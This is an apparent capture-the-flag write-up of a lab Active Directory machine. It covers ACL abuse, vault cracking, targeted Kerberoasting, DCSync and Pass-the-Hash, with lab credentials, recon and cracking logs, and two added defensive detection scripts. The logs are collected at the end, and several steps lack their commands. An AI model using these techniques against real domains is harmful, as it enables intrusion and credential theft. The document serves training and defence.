ACL abuse chain on a Windows DC: pivot through AD users via GenericAll/ForceChangePassword, crack an FTP password vault, Kerberoast to DCSync, then Pass-the-Hash for full admin.
Administrator
Difficulty: Medium
OS: Windows
Category: Active Directory
IP:10.129.2.60
Overview
Administrator is a medium-difficulty Windows Active Directory machine. The attack chain involves exploiting a series of AD privilege relationships (ACL abuse) to pivot through multiple domain accounts, eventually gaining DCSync rights and dumping the domain's NTLM hashes. The path is:
Enumeration
Nmap
Clock skew of ~7 hours was noted — relevant for Kerberos, which by default rejects requests whose timestamp is more than 5 minutes off the DC's clock. Keep this in mind for the Kerberos-based steps below.
RID Brute-Force (User Enumeration)
Using NetExec with the provided starting credentials olivia:ichliebedich. This technique enumerates domain users and groups by iterating over Windows Security Identifiers (SIDs). Key accounts discovered:
Foothold — BloodHound ACL Abuse
Olivia → Michael (GenericAll)
BloodHound analysis revealed that Olivia holds GenericAll over the Michael account. GenericAll is effectively full control over an object; it includes the ability to reset the user's password without knowing the current one.
Michael → Benjamin (ForceChangePassword)
BloodHound further showed that Michael holds ForceChangePassword over Benjamin. This is a more targeted ACE (Access Control Entry) that specifically permits password resets.
Michael has no additional privileges beyond what Olivia already had — the sole purpose of this pivot is to reach Benjamin, who has FTP access.
FTP — Backup.psafe3
With Benjamin's credentials, logging into FTP reveals a single file:
Cracking the Password Safe
Backup.psafe3 is a Password Safe v3 database — an encrypted credential vault protected by a master password.
Step 1: Extract the hash with pwsafe2john
Step 2: Crack with John the Ripper against rockyou.txt
Step 3: Open the vault with the master password tekieromucho to retrieve Emily's credentials
From this .psafe3 vault we obtain Emily's password: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
User Flag — Emily via WinRM
Privilege Escalation
Emily → Ethan (Targeted Kerberoasting via GenericWrite)
BloodHound shows Emily has GenericWrite over the Ethan account. GenericWrite allows modification of most non-protected attributes of an AD object, including servicePrincipalName (SPN).
The attack — Targeted Kerberoasting:
The idea is to temporarily assign a fake SPN to Ethan's account. Any account with an SPN registered is eligible for Kerberoasting — the Domain Controller will issue a TGS (Ticket Granting Service) ticket encrypted with Ethan's NTLM hash, which can then be cracked offline.
Note: Shadow Credentials was also attempted (adding a key to msDS-KeyCredentialLink), but failed because PKINIT (the Kerberos extension required for certificate-based authentication) was not available or not configured for this environment.
Step 1: Set a fake SPN on Ethan using bloodyAD
Step 2: Request the TGS ticket with impacket-GetUserSPNs. This returns a $krb5tgs$23$*ethan$... hash (RC4-encrypted Kerberos service ticket).
Step 3: Crack with Hashcat:
Cracking this hash with Hashcat gave the password limpbizkit.
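The defender's view of the three steps above, as an added example that is not part of the writeup: a targeted Kerberoast leaves a servicePrincipalName write on a user object (event 5136) followed by a TGS request for that account with RC4 (event 4769, encryption type 0x17, which is what the $krb5tgs$23$ hash encodes). The event records below are constructed samples with simplified field names; svc_sql is a hypothetical account.

```python
"""Added example: detect targeted Kerberoasting from DC security events.
Correlates a servicePrincipalName write (5136) on a user account with a later
TGS request for that account using RC4 (4769, etype 0x17). Samples are constructed."""
from datetime import datetime, timedelta

# Constructed samples; keys mirror 5136 ObjectDN/AttributeLDAPDisplayName/SubjectUserName
# and 4769 ServiceName/TicketEncryptionType/TargetUserName.
EVENTS = [
    {"id": 5136, "t": "2026-03-10T14:40:01", "dn": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "attr": "servicePrincipalName", "subject": "emily"},
    {"id": 4769, "t": "2026-03-10T14:40:09", "service": "ethan", "etype": "0x17", "client": "emily"},
    {"id": 4769, "t": "2026-03-10T14:41:00", "service": "DC$", "etype": "0x12", "client": "emily"},
    {"id": 4769, "t": "2026-03-10T14:41:30", "service": "krbtgt", "etype": "0x17", "client": "olivia"},
    {"id": 4769, "t": "2026-03-10T16:00:00", "service": "svc_sql", "etype": "0x17", "client": "emma"},
]
WINDOW = timedelta(hours=1)   # an SPN write this close to the TGS request is treated as linked

def cn_of(dn):
    """First RDN value of a DN: 'CN=ethan,CN=Users,...' -> 'ethan'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def is_roastable_user(name):
    """Service principals that are user accounts, not machines ($) or the KDC itself."""
    return not name.endswith("$") and name.lower() != "krbtgt"

def detect(events, window=WINDOW):
    """Return (rule, service_account, requesting_client, spn_writer_or_None) tuples."""
    spn_writes = {}   # account -> (time of SPN write, who wrote it)
    findings = []
    for e in sorted(events, key=lambda ev: ev["t"]):
        t = datetime.fromisoformat(e["t"])
        if e["id"] == 5136 and e["attr"] == "servicePrincipalName":
            spn_writes[cn_of(e["dn"]).lower()] = (t, e["subject"])
        elif e["id"] == 4769 and e["etype"] == "0x17" and is_roastable_user(e["service"]):
            svc = e["service"].lower()
            wrote = spn_writes.get(svc)
            if wrote and t - wrote[0] <= window:
                findings.append(("targeted_kerberoast", svc, e["client"], wrote[1]))
            else:   # RC4 ticket for a user SPN with no recent write: plain Kerberoasting
                findings.append(("rc4_tgs_for_user_spn", svc, e["client"], None))
    return findings
```

Machine accounts and krbtgt are excluded because their tickets are expected traffic; the RC4 filter alone flags only what is cheap to crack offline.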
Ethan → Administrator (DCSync)
BloodHound shows Ethan holds three critical permissions on the administrator.htb domain object:
GetChanges
GetChangesAll
GetChangesInFilteredSet
Together, GetChanges + GetChangesAll are the exact permissions required to perform a DCSync attack. DCSync mimics the behavior of a Domain Controller replicating directory data — it lets an attacker request the NTLM hash of any account directly from the DC, without needing to touch LSASS or run code on the DC.
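An added audit example covering every ACE type in the chain (Olivia→Michael GenericAll, Michael→Benjamin ForceChangePassword, Emily→Ethan GenericWrite, Ethan→domain GetChanges/GetChangesAll); it is not code from the writeup. It parses an object's SDDL string, which is what an administrator pulls from the nTSecurityDescriptor attribute, and maps allow ACEs to the BloodHound edge names. The extended-right GUIDs are the well-known schema values; the SDDL samples are constructed, with placeholder domain SIDs whose RIDs match the accounts above.

```python
"""Added audit example (not from the writeup): parse an AD object's SDDL and flag
the ACE types abused above, from GenericAll down to the replication pair DCSync needs."""
import re
from collections import defaultdict
# Well-known schema GUIDs of the extended rights involved (not page-specific values).
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"
DS_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
# SDDL two-letter rights codes -> access-mask bits.
CODES = {"GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
         "WD": 0x40000, "WO": 0x80000, "RC": 0x20000, "SD": 0x10000, "CR": 0x100, "LO": 0x80,
         "DT": 0x40, "WP": 0x20, "RP": 0x10, "SW": 0x8, "LC": 0x4, "DC": 0x2, "CC": 0x1}
ACE = re.compile(r"\((?:A|OA);[^;]*;([^;]*);([^;]*);[^;]*;([^)]*)\)")  # allow ACEs only

def mask_of(rights):
    if rights.startswith("0x"):                    # rights are a hex mask or two-letter codes
        return int(rights, 16)
    return sum(CODES[rights[i:i + 2]] for i in range(0, len(rights), 2))

def edges_of(mask, guid):
    """Translate one allow ACE into the BloodHound edge names used above."""
    if mask & 0x10000000 or (mask & 0xF01FF) == 0xF01FF:
        return {"GenericAll"}                      # full control: implies all below
    edges = set()
    if mask & 0x40000: edges.add("WriteDacl")
    if mask & 0x80000: edges.add("WriteOwner")
    if mask & 0x40000000 or (mask & 0x20 and not guid):
        edges.add("GenericWrite")                  # any attribute, SPN included
    if mask & 0x100:                               # control-access (extended) right
        edges |= {FORCE_CHANGE_PASSWORD: {"ForceChangePassword"}, DS_GET_CHANGES: {"GetChanges"},
                  DS_GET_CHANGES_ALL: {"GetChangesAll"}, "": {"AllExtendedRights"}}.get(guid, set())
    return edges

def audit(sddl, trusted=frozenset()):
    """{trustee_sid: sorted edges} for every trustee outside the allow-list."""
    by_sid = defaultdict(set)
    for rights, guid, sid in ACE.findall(sddl):
        if sid not in trusted:
            by_sid[sid] |= edges_of(mask_of(rights), guid.lower())
    for edges in by_sid.values():                  # GetChanges + GetChangesAll = DCSync
        if {"GetChanges", "GetChangesAll"} <= edges or "AllExtendedRights" in edges:
            edges.add("DCSync")
    return {sid: sorted(e) for sid, e in by_sid.items() if e}
# Constructed SDDL for the objects in the chain; the domain part of each SID is a placeholder.
SAMPLES = {
    "michael": "O:DAG:DAD:(A;;GA;;;S-1-5-21-0-0-0-1108)(A;;RPLCLORC;;;AU)",
    "benjamin": "O:DAG:DAD:(OA;;CR;" + FORCE_CHANGE_PASSWORD + ";;S-1-5-21-0-0-0-1109)",
    "ethan": "O:DAG:DAD:(A;;RPWP;;;S-1-5-21-0-0-0-1112)",
    "domain": "O:DAG:DAD:(OA;;CR;" + DS_GET_CHANGES + ";;S-1-5-21-0-0-0-1113)"
              "(OA;;CR;" + DS_GET_CHANGES_ALL + ";;S-1-5-21-0-0-0-1113)(OA;;CR;" + DS_GET_CHANGES_ALL + ";;DA)",
}
```

Read-only ACEs (such as the Authenticated Users entry on michael) produce no edge, and passing the expected holders (DA, Domain Controllers) in `trusted` leaves only the unexpected grants in the output.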
Key hashes retrieved:
Root Flag — Pass-the-Hash as Administrator
With the Administrator's NT hash, we perform a Pass-the-Hash attack. PTH works because Windows NTLM authentication accepts the raw hash in place of a password — there is no need to crack it.
┌──(kali㉿kali)-[~]
└─$ nmap 10.129.2.60 -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-10 03:23 -0400
Nmap scan report for 10.129.2.60
Host is up (0.43s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-10 14:23:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-10T14:23:37
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.67 seconds
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.2.60 -u "olivia" -p "ichliebedich" --rid-brute
SMB 10.129.2.60 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.2.60 445 DC [+] administrator.htb\olivia:ichliebedich
SMB 10.129.2.60 445 DC 498: ADMINISTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 500: ADMINISTRATOR\Administrator (SidTypeUser)
SMB 10.129.2.60 445 DC 501: ADMINISTRATOR\Guest (SidTypeUser)
SMB 10.129.2.60 445 DC 502: ADMINISTRATOR\krbtgt (SidTypeUser)
SMB 10.129.2.60 445 DC 512: ADMINISTRATOR\Domain Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 513: ADMINISTRATOR\Domain Users (SidTypeGroup)
SMB 10.129.2.60 445 DC 514: ADMINISTRATOR\Domain Guests (SidTypeGroup)
SMB 10.129.2.60 445 DC 515: ADMINISTRATOR\Domain Computers (SidTypeGroup)
SMB 10.129.2.60 445 DC 516: ADMINISTRATOR\Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 517: ADMINISTRATOR\Cert Publishers (SidTypeAlias)
SMB 10.129.2.60 445 DC 518: ADMINISTRATOR\Schema Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 519: ADMINISTRATOR\Enterprise Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 520: ADMINISTRATOR\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.2.60 445 DC 521: ADMINISTRATOR\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 522: ADMINISTRATOR\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 525: ADMINISTRATOR\Protected Users (SidTypeGroup)
SMB 10.129.2.60 445 DC 526: ADMINISTRATOR\Key Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 527: ADMINISTRATOR\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 553: ADMINISTRATOR\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.2.60 445 DC 571: ADMINISTRATOR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.2.60 445 DC 572: ADMINISTRATOR\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.2.60 445 DC 1000: ADMINISTRATOR\DC$ (SidTypeUser)
SMB 10.129.2.60 445 DC 1101: ADMINISTRATOR\DnsAdmins (SidTypeAlias)
SMB 10.129.2.60 445 DC 1102: ADMINISTRATOR\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.2.60 445 DC 1108: ADMINISTRATOR\olivia (SidTypeUser)
SMB 10.129.2.60 445 DC 1109: ADMINISTRATOR\michael (SidTypeUser)
SMB 10.129.2.60 445 DC 1110: ADMINISTRATOR\benjamin (SidTypeUser)
SMB 10.129.2.60 445 DC 1111: ADMINISTRATOR\Share Moderators (SidTypeAlias)
SMB 10.129.2.60 445 DC 1112: ADMINISTRATOR\emily (SidTypeUser)
SMB 10.129.2.60 445 DC 1113: ADMINISTRATOR\ethan (SidTypeUser)
SMB 10.129.2.60 445 DC 3601: ADMINISTRATOR\alexander (SidTypeUser)
SMB 10.129.2.60 445 DC 3602: ADMINISTRATOR\emma (SidTypeUser)
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ ftp benjamin@10.129.2.60
Connected to 10.129.2.60.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||58581|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
ftp> binary
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||58585|)
150 Opening BINARY mode data connection.
100% |**********************************************************************************************************************************************************************************************| 952 1.40 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:01 (0.89 KiB/s)
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ echo '$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050' > hash.txt
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (?)
1g 0:00:00:00 DONE (2026-03-10 05:19) 4.166g/s 34133p/s 34133c/s 34133C/s newzealand..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.